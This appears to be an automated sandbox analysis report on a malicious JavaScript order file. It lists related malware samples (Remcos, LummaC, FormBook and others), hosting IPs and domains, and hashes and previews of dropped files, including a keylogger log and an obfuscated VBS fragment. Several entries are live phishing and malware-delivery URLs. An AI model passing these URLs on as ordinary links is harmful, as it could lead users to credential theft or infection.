bg.microsoft.map.fastly.net | Documents.pdf | Get hash | malicious | Remcos, DBatLoader | Browse | 199.232.214.172
bg.microsoft.map.fastly.net | FW_ TBI Construction Company.eml | Get hash | malicious | Unknown | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | cv.docm | Get hash | malicious | Unknown | Browse | 199.232.214.172
bg.microsoft.map.fastly.net | rsIMIwPUAU.doc | Get hash | malicious | Unknown | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | CwsM6q5l8O.doc | Get hash | malicious | Unknown | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | 5XrJcH26DG.docx | Get hash | malicious | Unknown | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | UKBHxdhIyJ.docx | Get hash | malicious | Sidewinder | Browse | 199.232.210.172
paste.ee | NB PO-104105107108.xls | Get hash | malicious | Unknown | Browse | 188.114.96.6
paste.ee | greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta | Get hash | malicious | Cobalt Strike, Remcos | Browse | 104.21.84.67
paste.ee | goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta | Get hash | malicious | Cobalt Strike, FormBook | Browse | 172.67.187.200
paste.ee | creamkissingthingswithcreambananapackagecreamy.hta | Get hash | malicious | Cobalt Strike, Remcos | Browse | 104.21.84.67
paste.ee | Cot90012ARCACONTAL.xls | Get hash | malicious | Remcos | Browse | 188.114.97.6
paste.ee | SOA USD67,353.35.xla.xlsx | Get hash | malicious | Unknown | Browse | 188.114.97.6
paste.ee | Euro confirmation Sp.xls | Get hash | malicious | Unknown | Browse | 188.114.96.6
paste.ee | print preview.js | Get hash | malicious | FormBook | Browse | 172.67.187.200
paste.ee | nicegirlforyou.hta | Get hash | malicious | Cobalt Strike, Remcos | Browse | 104.21.84.67
paste.ee | nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta | Get hash | malicious | Cobalt Strike, Remcos | Browse | 104.21.84.67
geoplugin.net | requests-pdf.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | Documents.pdf | Get hash | malicious | Remcos, DBatLoader | Browse | 178.237.33.50
geoplugin.net | x295IO8kqM.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | 7d74ApV4bb.exe | Get hash | malicious | Remcos, DBatLoader | Browse | 178.237.33.50
geoplugin.net | greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta | Get hash | malicious | Cobalt Strike, Remcos | Browse | 178.237.33.50
geoplugin.net | SwiftCopy_PaymtRecpt121224.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | WO-663071 Sabiya Power Station Project.vbs | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | 4JwhvqLe8n.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | fIPSLgT0lO.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | IXCbn4ZcdS.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
FASTLYUS | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | Browse | 151.101.193.91
 | https://www.google.co.ao/url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2F7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ== | Get hash | malicious | HTMLPhisher | Browse | 151.101.66.137
 | https://u13974777.ct.sendgrid.net/ls/click?upn=u001.1GFl1p-2BBYL-2Bhgs5F-2B0NOkrtNxvRU5lHyHn9X7Gay0rMweTw4Bty7YorCE1pBfo679HN2Nod-2BfRWA-2FvzNVU6n0ycgVO9YFLntVOrRszMr10A-3DE-mj_xaXJc0NsC5WAXuVv6HNgzGH9nxkzD8xRdi-2BQVNVTAgV30zfSKc1z4I-2Bc6Qx1hEzdtXusfFTLvSScqQmgK1DgmCe6NsmhCnbLpmZI7EPM56c0IpOXy2jX8FUofqX-2FLwkrDNu-2BJ8VdkhW-2BcibVgB56YvBarWAJ68QdVLDk-2BreYFAbG2RxK5FI2ZOf8OuVaYqzfkm-2FGiI9tY4Y1XN-2FN7Uh8Vtzi-2FP-2B8s9qjOHBuznAYsq-2B4GCewCcJExgcNnMrLH-2B3Pv6vH6wzFQkN2aMTddwwaWvcIkZYQDF7aLn1FYUQMocCkCTJEmkArX-2Bdrge72rYVSFN-2FsI6AAcwN5SA74y-2B4g6Q-3D-3D | Get hash | malicious | Unknown | Browse | 151.101.65.44
 | http://vzgb5l.elnk8.com/83885021a686e36f9150aaf51cbc0afdh | Get hash | malicious | Unknown | Browse | 151.101.2.217
 | https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document | Get hash | malicious | HTMLPhisher | Browse | 151.101.129.181
 | 18037.doc | Get hash | malicious | Unknown | Browse | 151.101.67.6
 | Codale Electric Supply Health Insurance Benefits Open Enrollment Plan.html.shtml | Get hash | malicious | Unknown | Browse | 151.101.1.229
 | https://unicoengineering.microsoftfederalcloud.com/TvL1x?e=acis.teamangie@amwins.com | Get hash | malicious | Unknown | Browse | 151.101.2.137
 | https://docs.google.com/presentation/d/e/2PACX-1vSwojdyiXkpmoOGroSpmyU1bXlyQ1pGq6J4xqXeFbLhc-orzr_d9gd79t3Kfc7MNOR4W_H4cofhR0E4/pub?start=false&loop=false&delayms=3000 | Get hash | malicious | HTMLPhisher | Browse | 151.101.194.137
 | https://docs.google.com/presentation/d/e/2PACX-1vSwojdyiXkpmoOGroSpmyU1bXlyQ1pGq6J4xqXeFbLhc-orzr_d9gd79t3Kfc7MNOR4W_H4cofhR0E4/pub?start=false&loop=false&delayms=3000 | Get hash | malicious | Unknown | Browse | 151.101.2.137
ATOM86-ASATOM86NL | requests-pdf.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | Documents.pdf | Get hash | malicious | Remcos, DBatLoader | Browse | 178.237.33.50
 | x295IO8kqM.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | 7d74ApV4bb.exe | Get hash | malicious | Remcos, DBatLoader | Browse | 178.237.33.50
 | greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta | Get hash | malicious | Cobalt Strike, Remcos | Browse | 178.237.33.50
 | SwiftCopy_PaymtRecpt121224.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | WO-663071 Sabiya Power Station Project.vbs | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | 4JwhvqLe8n.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | fIPSLgT0lO.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | IXCbn4ZcdS.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
CLOUDFLARENETUS | HIDE0RerES.exe | Get hash | malicious | LummaC | Browse | 172.67.207.38
 | Dqw8QFydEX.exe | Get hash | malicious | LummaC | Browse | 104.21.112.1
 | ORDER - 401.exe | Get hash | malicious | FormBook | Browse | 172.67.220.36
 | order confirmation.exe | Get hash | malicious | FormBook | Browse | 104.21.90.137
 | Shipment 990847575203.pdf.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 172.67.177.134
 | Setup.msi | Get hash | malicious | Unknown | Browse | 104.21.58.24
 | SET_UP.exe | Get hash | malicious | LummaC | Browse | 172.67.207.38
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | Browse | 104.21.67.145
 | Setup.exe | Get hash | malicious | LummaC Stealer | Browse | 172.67.207.38
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar | Browse | 172.67.207.38
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | Shipment 990847575203.pdf.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.84.67, 151.101.193.137
 | file.exe | Get hash | malicious | XWorm | Browse | 104.21.84.67, 151.101.193.137
 | gjvU5KOFhX.exe | Get hash | malicious | Discord Token Stealer, Millenuim RAT | Browse | 104.21.84.67, 151.101.193.137
 | svhost.vbs | Get hash | malicious | Unknown | Browse | 104.21.84.67, 151.101.193.137
 | hvqc3lk7ly.exe | Get hash | malicious | Discord Token Stealer, DotStealer | Browse | 104.21.84.67, 151.101.193.137
 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.84.67, 151.101.193.137
 | adv.ps1 | Get hash | malicious | LummaC | Browse | 104.21.84.67, 151.101.193.137
 | d2W4YpqsKg.lnk | Get hash | malicious | LummaC | Browse | 104.21.84.67, 151.101.193.137
 | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Get hash | malicious | MassLogger RAT | Browse | 104.21.84.67, 151.101.193.137
 | https://nam.dcv.ms/0CX72Iqyxf | Get hash | malicious | HTMLPhisher | Browse | 104.21.84.67, 151.101.193.137
37f463bf4616ecd445d4a1937da06e19 | 7VfKPMdmiX.exe | Get hash | malicious | Unknown | Browse | 151.101.193.137
 | 7VfKPMdmiX.exe | Get hash | malicious | Unknown | Browse | 151.101.193.137
 | Setup.msi | Get hash | malicious | Unknown | Browse | 151.101.193.137
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | Browse | 151.101.193.137
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar | Browse | 151.101.193.137
 | file.exe | Get hash | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig | Browse | 151.101.193.137
 | file.exe | Get hash | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig | Browse | 151.101.193.137
 | file.exe | Get hash | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig | Browse | 151.101.193.137
 | file.exe | Get hash | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig | Browse | 151.101.193.137
 | file.exe | Get hash | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig | Browse | 151.101.193.137
                                                                                                                                          No context
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):144
                                                                                                                                          Entropy (8bit):3.3603882199736725
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:rhlKlyKKltVlP4eDl5JWRal2Jl+7R0DAlBG45klovDl6v:6lZ3U5YcIeeDAlOWAv
                                                                                                                                          MD5:E26B4B3A278ECDC8E36AEAE1AA27AD7A
                                                                                                                                          SHA1:4EAC8D9915AE5243190817B6540BC0DC3091F682
                                                                                                                                          SHA-256:A32CDD7AF64C2A633D3D1619D01A285ECBFDFAD614BCD3858DFD71D479622FBE
                                                                                                                                          SHA-512:7E59CAFC0201C78EEAE0E1AB1761016173A6E7314980A18B8943801C024A91125312045329D36463C0B0D379550188E083BFCD464EA58B1ACD89B371C53E4EA5
                                                                                                                                          Malicious:true
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                                          Preview:....[.2.0.2.4./.1.2./.1.4. .0.8.:.0.0.:.4.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):963
                                                                                                                                          Entropy (8bit):5.018384957371898
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:tkluWJmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkD:qlupdVauKyGX85jvXhNlT3/7CcVKWro
                                                                                                                                          MD5:0F26B79167E7BB356D7AB35E01B90A0E
                                                                                                                                          SHA1:4655C51903490C3536D4A5D0885D17267526E56C
                                                                                                                                          SHA-256:0E7A0C4D81A5F0AB568FCF592D369FF0007E1D5DF1130327353347C79BD2BCA6
                                                                                                                                          SHA-512:B7A8B80DCC0463F5C89DC6F1D8F89E7C570494B9A55A9A05B278371ABDE2D74D3F0A76163A836E8FD7AF94F37A167B9807C441A1C19EF4F04408B509D0204376
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):157299
                                                                                                                                          Entropy (8bit):5.496627991893972
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:JhA7MEY0VjVbu/2yThA7MEY0VjohA7MEY0VjVbu/2yThA7MEY0Vj4:JhAG0VjVq/2khAG0VjohAG0VjVq/2kht
                                                                                                                                          MD5:E39538CF60C1A9768333BF00E0262702
                                                                                                                                          SHA1:AB80FC0C03325EA2647FC486B028CBC7CE705B3B
                                                                                                                                          SHA-256:DD3DD3F0DA4553EF81C7FE5AE31F89454187E3B9CBC068A76CA7A9AE8CF2A873
                                                                                                                                          SHA-512:807A7A24CE847771A9CADA7DD8D5A547A8946F2F86B61C8C612AAA675FBF55AD8AB96B381684AE0AECE38E11535C46B2AE284973EC7324F28B6CD7EAACEBD86F
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:qiWGNGNfWuxibBW = "KNukGUBZCLLcBJa"..KLkOkOuGhjxmLzz = "cnfLuvcWWufiKBI"..LWLNbkemUWgAuCL = "LldKexUlmLIemxp"..ugchgKaBQLpmciK = "OoOGKLGWLNLUAkS"..iLhbTaLLgldfoWH = "TmKnNJhUniaWniN"..ubvpLiWLAkeAdhc = "keLWJcKfPlBiKLz"..PaRhfNlPdiiNQlW = "iCIlSzWAknQGNiK"..WouuNKWiIWdLbZI = "ZLkLrcHZGfbxmkk"..LxucoeARcJkcGWd = "LmipGasncAqaicQ"..LldbUbcdcUWxcGW = "mofapWOsQLWfLeU"....LGcdPKWeLbGSiBR = "hJLegLkWhCTNddK"..LGGlgbUlbCtKAiR = "WlLLAOiLrUiNPZW"..qALPcklAqeWRpWZ = "zeKumKThZmrnSlN"..UbWiBKpzWGtdUWk = "LplCGTOvJlKWkcZ"..GzKzzBCKGKeQkNW = "hcLolmgfUBjkmcc"..fgAiOWpRvmWcGLU = "khWLKkSZTqdiNoe"..WkKiLJWpxaquPbm = "BiGPAUaTULzKWof"..eeWiuTRpnizCNbJ = "ZpiflakWkgUKCGb"..WAtfLhhphmpZhuL = "PUepqRzWtuzkGsZ"..rioeccGlilhuAbW = "zUihKbLZlLpcWmq"....aWikZROLusGHicC = "LAkhLBpPtfmdKCc"..bZicGiWecQTnUes = "LBWWUpGkmbbcimK"..tucuKmTNNbtUvsf = "WqNLUJTzGWWtApm"..hiPWlCHfApLWAcZ = "CkNJbJrsWxLInbW"..GuazPjlcWAIiAQH = "bxtiGkqWcbGLKKk"..dBkefnWUgkLngQW = "cfNOpKIiAiRGriI"..KzcLjLlpSkCaxcL = "LoBdUUxKJdlfBWc
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):9434
                                                                                                                                          Entropy (8bit):4.928515784730612
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                                                                          MD5:D3594118838EF8580975DDA877E44DEB
                                                                                                                                          SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                                                                          SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                                                                          SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):64
                                                                                                                                          Entropy (8bit):1.1940658735648508
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Nlllul55bl/Z:NllU
                                                                                                                                          MD5:D3B86703AAED73DD3EC0A467E8E94A75
                                                                                                                                          SHA1:0F4F7B2D253B1E5317E0523C584323EFE648AFCC
                                                                                                                                          SHA-256:B3FA547E57A764C37C994F3A72929E499C8AAEDA177BDBACD9E7F3C8A34348E1
                                                                                                                                          SHA-512:D358B7BAFDC693B4B7BA03638A67A5D27F3C3C3C222DDC015A0BCA3383510AF3AAB54D088EC6BF995580C3EA3B68AC78A11AE4360486886BA4DAEB2C631FA941
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:@...e................................................@..........
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x3a09f41b, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):14680064
                                                                                                                                          Entropy (8bit):1.0144168073315183
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:9DPwX329Pr9PA60q0mNZG3HjW7CsoGn98hQjW7CsoGn98y7CsoGQaGCjIWsXtXXo:DpI6l4c1nq5iYT8KAKAuND
                                                                                                                                          MD5:FC06D809F655320826194E980391A317
                                                                                                                                          SHA1:9AFAD5762B586952AC9C1A8BF6AD86B161FA2784
                                                                                                                                          SHA-256:0DAF21D1CD3ADE7C220ADDF773783D0D427A18A538E670AC674A1A01DB992144
                                                                                                                                          SHA-512:6B16C3C52540AD03453C3896A90C6E6F7B466A0525F86A5089287777CCC6F272B1D82BFFC20D56F9B04DAA7737184C7F3BCC6F11394C1D47D327C076612D3038
                                                                                                                                          Malicious:false
                                                                                                                                          Preview::...... ........................{......................../..........{5......|..h.1..................................{..............................................................................................V...........eJ......n........................................................................................................... ............{C..................................................................................................................................................................................................{...........................................|7..................k.......|...........................#......h.1.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2
                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Qn:Qn
                                                                                                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:..
                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):157299
                                                                                                                                          Entropy (8bit):5.496627991893972
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:JhA7MEY0VjVbu/2yThA7MEY0VjohA7MEY0VjVbu/2yThA7MEY0Vj4:JhAG0VjVq/2khAG0VjohAG0VjVq/2kht
                                                                                                                                          MD5:E39538CF60C1A9768333BF00E0262702
                                                                                                                                          SHA1:AB80FC0C03325EA2647FC486B028CBC7CE705B3B
                                                                                                                                          SHA-256:DD3DD3F0DA4553EF81C7FE5AE31F89454187E3B9CBC068A76CA7A9AE8CF2A873
                                                                                                                                          SHA-512:807A7A24CE847771A9CADA7DD8D5A547A8946F2F86B61C8C612AAA675FBF55AD8AB96B381684AE0AECE38E11535C46B2AE284973EC7324F28B6CD7EAACEBD86F
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:qiWGNGNfWuxibBW = "KNukGUBZCLLcBJa"..KLkOkOuGhjxmLzz = "cnfLuvcWWufiKBI"..LWLNbkemUWgAuCL = "LldKexUlmLIemxp"..ugchgKaBQLpmciK = "OoOGKLGWLNLUAkS"..iLhbTaLLgldfoWH = "TmKnNJhUniaWniN"..ubvpLiWLAkeAdhc = "keLWJcKfPlBiKLz"..PaRhfNlPdiiNQlW = "iCIlSzWAknQGNiK"..WouuNKWiIWdLbZI = "ZLkLrcHZGfbxmkk"..LxucoeARcJkcGWd = "LmipGasncAqaicQ"..LldbUbcdcUWxcGW = "mofapWOsQLWfLeU"....LGcdPKWeLbGSiBR = "hJLegLkWhCTNddK"..LGGlgbUlbCtKAiR = "WlLLAOiLrUiNPZW"..qALPcklAqeWRpWZ = "zeKumKThZmrnSlN"..UbWiBKpzWGtdUWk = "LplCGTOvJlKWkcZ"..GzKzzBCKGKeQkNW = "hcLolmgfUBjkmcc"..fgAiOWpRvmWcGLU = "khWLKkSZTqdiNoe"..WkKiLJWpxaquPbm = "BiGPAUaTULzKWof"..eeWiuTRpnizCNbJ = "ZpiflakWkgUKCGb"..WAtfLhhphmpZhuL = "PUepqRzWtuzkGsZ"..rioeccGlilhuAbW = "zUihKbLZlLpcWmq"....aWikZROLusGHicC = "LAkhLBpPtfmdKCc"..bZicGiWecQTnUes = "LBWWUpGkmbbcimK"..tucuKmTNNbtUvsf = "WqNLUJTzGWWtApm"..hiPWlCHfApLWAcZ = "CkNJbJrsWxLInbW"..GuazPjlcWAIiAQH = "bxtiGkqWcbGLKKk"..dBkefnWUgkLngQW = "cfNOpKIiAiRGriI"..KzcLjLlpSkCaxcL = "LoBdUUxKJdlfBWc
                                                                                                                                          File type:Unicode text, UTF-16, little-endian text, with very long lines (1540), with CRLF line terminators
                                                                                                                                          Entropy (8bit):4.4949425211620575
                                                                                                                                          TrID:
                                                                                                                                          • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                                                                                                                                          • MP3 audio (1001/1) 33.33%
                                                                                                                                          File name:PO_0099822111ORDER.js
                                                                                                                                          File size:5'038 bytes
                                                                                                                                          MD5:9c23d2a7acc6acc81022dee56521c2ba
                                                                                                                                          SHA1:40a93bafef8bfeec099f8f8f758336fe41a82a81
                                                                                                                                          SHA256:9b9059af739b167db6afce5129997e489dbb7baa3af27c8da5a68d564c2ed84e
                                                                                                                                          SHA512:193760ec2b498a40d2eb932314668aaf07c15d69b64ade12fe75e62d92a0a5ca34201f8f1c4a070b0e574e433fdf62fbe1785bbd2279f8e7fd58d2080df3aa88
                                                                                                                                          SSDEEP:48:zto05EfkLolvMHs8Zcj6qHs9aCgUvZ5LbmnpFP:ztFqfkL+vhj6qHsl5Z5LyrP
                                                                                                                                          TLSH:B3A12AB59B68439C6CF94B1AB71300AD071AF809987EC78C187CCC954B67E1949AEFCD
